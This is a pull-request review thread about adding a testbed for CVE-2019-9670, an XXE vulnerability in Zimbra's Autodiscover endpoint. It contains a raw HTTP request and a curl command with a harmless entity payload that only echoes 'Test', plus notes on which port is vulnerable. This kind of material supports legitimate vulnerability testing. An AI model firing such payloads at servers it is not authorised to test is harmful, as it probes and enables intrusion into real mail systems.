Testbed for CVE-2019-9670 - Synacor Zimbra XXE #113

LeonardoE95 · 2024-12-19T17:09:12Z

Hello there,

this PR contains the instructions required to setup a testbed for CVE-2019-9670.

Create .gitignore

giacomo-doyensec

Hello @LeonardoE95, thanks for your contribution!
The testbed is working, and the reproduction steps are clear. Please review the provided suggestions, and if they seem appropriate, feel free to apply them.

giacomo-doyensec · 2025-02-03T08:33:52Z

zimbra/CVE-2019-9670/README.md

+To test out the vulnerability, the following HTTP GET request can be used.
+
+Request
+
+```
+POST /Autodiscover/Autodiscover.xml HTTP/1.1
+Host: 127.0.0.1
+Content-Type: application/xml
+Content-Length: 177
+
+<!DOCTYPE foo [<!ELEMENT foo ANY>
+<!ENTITY xxe "Test"> ]>
+<Request>
+<EMailAddress>email</EMailAddress>
+<AcceptableResponseSchema>&xxe;</AcceptableResponseSchema>
+</Request>
+```


Please provide a cURL command to easily reproduce the vulnerability without requiring an intercepting proxy

Suggested change

To test out the vulnerability, the following HTTP GET request can be used.

Request

```

POST /Autodiscover/Autodiscover.xml HTTP/1.1

Host: 127.0.0.1

Content-Type: application/xml

Content-Length: 177

<!DOCTYPE foo [<!ELEMENT foo ANY>

<!ENTITY xxe "Test"> ]>

<Request>

<EMailAddress>email</EMailAddress>

<AcceptableResponseSchema>&xxe;</AcceptableResponseSchema>

</Request>

```

## Reproduction Steps

To test out the vulnerability, the following curl command can be used:

```

curl -k -X $'POST'\

--data-binary $'<!DOCTYPE foo [<!ELEMENT foo ANY>\x0d\x0a<!ENTITY xxe \"Test\"> ]>\x0d\x0a<Request>\x0d\x0a<EMailAddress>email</EMailAddress>\x0d\x0a<AcceptableResponseSchema>&xxe;</AcceptableResponseSchema>\x0d\x0a</Request>' \

$'https://{service-host}:{port}/Autodiscover/Autodiscover.xml'

```

which will generate a POST request similar to the one reported below:

```

POST /Autodiscover/Autodiscover.xml HTTP/1.1

Content-Type: application/xml

Content-Length: 177

<!DOCTYPE foo [<!ELEMENT foo ANY>

<!ENTITY xxe "Test"> ]>

<Request>

<EMailAddress>email</EMailAddress>

<AcceptableResponseSchema>&xxe;</AcceptableResponseSchema>

</Request>

```

Useful feedback, thanks, added the curl command!

giacomo-doyensec · 2025-02-03T08:36:51Z

zimbra/CVE-2019-9670/README.md

+When sent to the vulnerable port (`8443`), the response will contain the string `Test`.
+
+Vulnerable Response


Suggested change

When sent to the vulnerable port (`8443`), the response will contain the string `Test`.

Vulnerable Response

### Vulnerable Response

When sent to the vulnerable instance on port `8443`, the response will contain the string `Test`, as shown in the example below:

giacomo-doyensec · 2025-02-03T08:38:30Z

zimbra/CVE-2019-9670/README.md

+When sent to the non vulnerable port (`8500`), the response will not containg the string `Test`.
+
+Non Vulnerable Response


Suggested change

When sent to the non vulnerable port (`8500`), the response will not containg the string `Test`.

Non Vulnerable Response

### Non Vulnerable Response

When sent to the non vulnerable instance on port `8500`, the response will not contain the string `Test`, as shown in the example below:

giacomo-doyensec

Hi @LeonardoE95, please apply these changes to remove some superfluous comments.
Thanks!

giacomo-doyensec · 2025-02-05T12:50:28Z